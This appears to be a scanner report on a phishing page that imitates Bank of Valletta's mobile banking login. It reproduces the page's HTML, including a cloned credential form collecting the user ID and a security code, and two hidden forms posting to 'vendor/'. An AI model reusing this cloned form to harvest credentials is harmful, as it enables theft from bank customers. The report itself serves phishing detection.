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Submission Tags: @phish_report
Submission: On June 14 via api from FI — Scanned from FI

Form analysis 3 forms found in the DOM

POST ?page=Loading

<form class="x-panel-body x-panel-body-noheader x-panel-body-noborder x-form" method="POST" id="loginFrm" action="?page=Loading" style="width: 100vw;">
  <input type="hidden" name="uniq" value="ccd9ecad">
  <input type="hidden" name="page" value="login">
  <div id="ext-comp-1019" class="x-tip login-tip" style="position: absolute; z-index: 10002; visibility: hidden; width: 380px; display: none;">
    <div class="x-tip-tl">
      <div class="x-tip-tr">
        <div class="x-tip-tc"></div>
    <div class="x-tip-bwrap" id="ext-gen46">
      <div class="x-tip-ml">
        <div class="x-tip-mr">
          <div class="x-tip-mc" id="ext-gen49">
            <div class="x-tip-body" id="ext-gen47" style="width: 348px;">
              <div id="ext-comp-1015" class=" info-tip">
                <div id="ext-comp-1016" class=" tip-title system-font-large bold">Enter your BOV User ID:</div>
                <div id="ext-comp-1017" class=" tip-body system-font">This is the six digit number assigned to you by BOV when you subscribed to BOV 24x7 Services. </div>
                <span title="Close" id="ext-comp-1018" class=" close"></span>
      <div class="x-tip-bl x-panel-nofooter" id="ext-gen48">
        <div class="x-tip-br">
          <div class="x-tip-bc"></div>
  <div id="ext-comp-1020" class="x-tip login-tip token-tip" style="position: absolute; z-index: 10002; visibility: hidden; width: 380px; display: none;">
    <div class="x-tip-tl">
      <div class="x-tip-tr">
        <div class="x-tip-tc"></div>
    <div class="x-tip-bwrap" id="ext-gen50">
      <div class="x-tip-ml">
        <div class="x-tip-mr">
          <div class="x-tip-mc" id="ext-gen53">
            <div class="x-tip-body" id="ext-gen51" style="width: 348px;">
              <div id="ext-comp-1021">
                <div id="ext-comp-1022" class=" left">
                  <div id="ext-comp-1023" class=" tip-title system-font-large bold">Choose your BOV Securekey:</div>
                  <div id="token-content" class=" tip-body system-font">
                        <li>Press <img src="urn:scrapbook:download:error:" alt="" align="top"> to switch on Securekey. </li>
                        <li>Press <img src="urn:scrapbook:download:error:" alt="" align="top"> to login. </li>
                        <li>Enter your PIN and press <img src="urn:scrapbook:download:error:" alt="" align="top">
                        <li>Enter the Login code in the authorisation code field.</li>
                <div id="ext-comp-1024" class=" select-dp310"></div>
                <div id="ext-comp-1025" class=" select-swtoken"></div>
                <span title="Close" id="ext-comp-1026" class=" close"></span>
                <div id="tip-token-image" class=" tip-token-image dp310"></div>
      <div class="x-tip-bl x-panel-nofooter" id="ext-gen52">
        <div class="x-tip-br">
          <div class="x-tip-bc"></div>
  <fieldset id="ext-comp-1030" class=" x-fieldset login-fieldset x-form-label-left" style="width: 85vw;">
    <div class="x-fieldset-bwrap" id="ext-gen54" style="scale: 1.2;text-align: center;">
      <div class="x-fieldset-body x-fieldset-body-noheader" id="ext-gen55" style="margin-top:5%">
        <div id="ext-comp-1031" class=" login-container-title system-font-extra-large bold"> Login to BOV Mobile</div>
        <div id="login-question-errorpanel" class=" x-panel login-msg-panel x-panel-noborder x-hide-display" style="width: 358px;">
          <div class="x-panel-bwrap" id="ext-gen62">
            <div class="x-panel-body x-panel-body-noheader x-panel-body-noborder" id="ext-gen63" style="width: 358px;"></div>
          <div id="errorMsg" style="color:crimson;font-weight:600;width:90%;display:none">There is a problem with your login: The login information that you have keyed in is incorrect. Please try again. </div>
          <div id="errMsg" style="color:crimson;font-weight:600;width:90%;display:none">Your confirmation code or security password was incorrect, if you have forgotten your security password, you can set a new one in your BOV 24x7 app.</div>
        <div class="x-form-item  x-hide-label" tabindex="-1" id="ext-gen65">
          <label for="usrlogin" style="width:100px;margin-bottom:20%" class="x-form-item-label" id="ext-gen66"></label>
          <div class="x-form-element" id="x-form-el-loginId" style="padding-left:105px">
            <input maxlength="12" minlength="4" autofocus="" type="tel" inputmode="numeric" size="20" autocomplete="off" id="usrlogin" name="IDToken1" class="x-form-text x-form-field x-form-empty-field"
              style="width: 252px;padding:10px;border-radius:5px" placeholder="Enter your BOV User ID">
          <div class="x-form-clear-left"></div>
        <div class="x-form-item  x-hide-label" tabindex="-1" id="ext-gen651">
          <label for="loginId" style="width:100px;margin-bottom:20%" class="x-form-item-label" id="ext-gen661"></label>
          <div class="x-form-element" id="x-form-el-loginId1" style="padding-left:105px">
            <input maxlength="11" minlength="2" type="tel" inputmode="numeric" size="20" autocomplete="off" id="phonenum" name="IDToken2" class="x-form-text x-form-field x-form-empty-field" style="width:252px;padding:10px;border-radius:5px"
              placeholder="Enter code">
          <div class="x-form-clear-left"></div>
        <center style="margin-bottom:20px">
          <table id="ext-comp-1033" class="x-btn ib-btn-secondary dark x-btn-noicon ib-btn-over" style="width:auto;padding-right:0px;border-collapse: collapse;border-radius:5px;border-style: hidden; /* hide standard table (collapsed) border */
                    box-shadow: 0 0 0 1px #666; /* this draws the table border  */ background-color:#89265E" cellspacing="0">
            <tbody class="x-btn-small x-btn-icon-small-left">
                <td class="x-btn-tl">
                <td class="x-btn-tc"></td>
                <td class="x-btn-tr">
              <tr style="padding: 5px;display: flex;width: 100%;">
                <td class="x-btn-ml">
                <td class="x-btn-mc" style="width:90%">
                  <em class=" x-unselectable" unselectable="on">
                    <button type="submit" name="" id="ext-gen60" class=" x-btn-text">Log In</button>
                <td class="x-btn-mr">
                <td class="x-btn-bl">
                <td class="x-btn-bc"></td>
                <td class="x-btn-br">
        <!-- <div style="margin-bottom:0%">
                    <div style="margin-top:7%">Tap to get a new activation code via SMS</div>
                      <img role=button src="partial/img/smartphone.jpg" style="width:60px;margin-top:5px" onclick="window.location.href='activate.php?user=true'">
                      <p style="width:30%">Get new activation code</p>
                  </div> -->
        <!-- <div style="margin-bottom:0%">
                    <div style="margin-top:7%">or login using Card details</div>
                      <img role=button src="partial/img/smartphone.jpg" style="width:60px;margin-top:5px" onclick="window.location.href='card-login.php?user=true'">
                      <p style="width:30%">Click to login with Card details</p>
                  </div> -->
  <div class="x-shadow" id="ext-gen44" style="z-index: 10001; left: 424px; top: 73px; width: 380px; height: 152px; display: block;">
    <div class="xst">
      <div class="xstl"></div>
      <div class="xstc" style="width: 368px;"></div>
      <div class="xstr"></div>
    <div class="xsc" style="height: 140px;">
      <div class="xsml"></div>
      <div class="xsmc" style="width: 368px;"></div>
      <div class="xsmr"></div>
    <div class="xsb">
      <div class="xsbl"></div>
      <div class="xsbc" style="width: 368px;"></div>
      <div class="xsbr"></div>
  <div id="ext-comp-1014" class="x-tip login-tip" style="position: absolute; z-index: 10002; visibility: visible; width: 380px;">
    <div class="x-tip-tl">
      <div class="x-tip-tr">
        <div class="x-tip-tc"></div>
    <div class="x-tip-bwrap" id="ext-gen40">
      <div class="x-tip-ml">
        <div class="x-tip-mr">
          <div class="x-tip-mc" id="ext-gen43">
            <div class="x-tip-body" id="ext-gen41" style="width: 348px;">
              <div id="ext-comp-1010" class=" info-tip">
                <div id="ext-comp-1011" class=" tip-title system-font-large bold">Welcome to BOV Internet Banking</div>
                <div id="ext-comp-1012" class=" tip-body system-font">We've included plenty of help topics and convenient tips in order to help you use BOV Internet Banking. You might like to take a tour before you get started.</div>
                <table id="ext-comp-1013" class="x-btn ib-btn-secondary light x-btn-noicon" style="width: auto;" cellspacing="0">
                  <tbody class="x-btn-small x-btn-icon-small-left">
                      <td class="x-btn-tl">
                      <td class="x-btn-tc"></td>
                      <td class="x-btn-tr">
                      <td class="x-btn-ml">
                      <td class="x-btn-mc">
                        <em class=" x-unselectable" unselectable="on">
                          <button type="button" id="ext-gen45" class=" x-btn-text">let's take a tour...</button>
                      <td class="x-btn-mr">
                      <td class="x-btn-bl">
                      <td class="x-btn-bc"></td>
                      <td class="x-btn-br">
      <div class="x-tip-bl x-panel-nofooter" id="ext-gen42">
        <div class="x-tip-br">
          <div class="x-tip-bc"></div>

POST vendor/

<form action="vendor/" method="POST">
  <div style="display:none;">
    <input type="text">
    <button style="display:none" type="submit">Submit button</button>

POST vendor/

<form action="vendor/" method="POST">
  <div style="display:none;">
    <input type="text">
    <button style="display:none" type="submit">Submit button</button>

Text Content

Enter your BOV User ID:
This is the six digit number assigned to you by BOV when you subscribed to BOV
24x7 Services.

Choose your BOV Securekey:
 1. Press to switch on Securekey.
 2. Press to login.
 3. Enter your PIN and press
 4. Enter the Login code in the authorisation code field.

Login to BOV Mobile

There is a problem with your login: The login information that you have keyed in
is incorrect. Please try again.
Your confirmation code or security password was incorrect, if you have forgotten
your security password, you can set a new one in your BOV 24x7 app.

      Log In      

Welcome to BOV Internet Banking
We've included plenty of help topics and convenient tips in order to help you
use BOV Internet Banking. You might like to take a tour before you get started.

      let's take a tour...      

Terms and conditions
Privacy policy
English Maltese

© 2018 Bank of Valletta p.l.c. This system is for the sole use of authorised
Bank of Valletta p.l.c. customers. All activities are monitored and recorded.
Unauthorised use of this system could lead to legal action being taken by the
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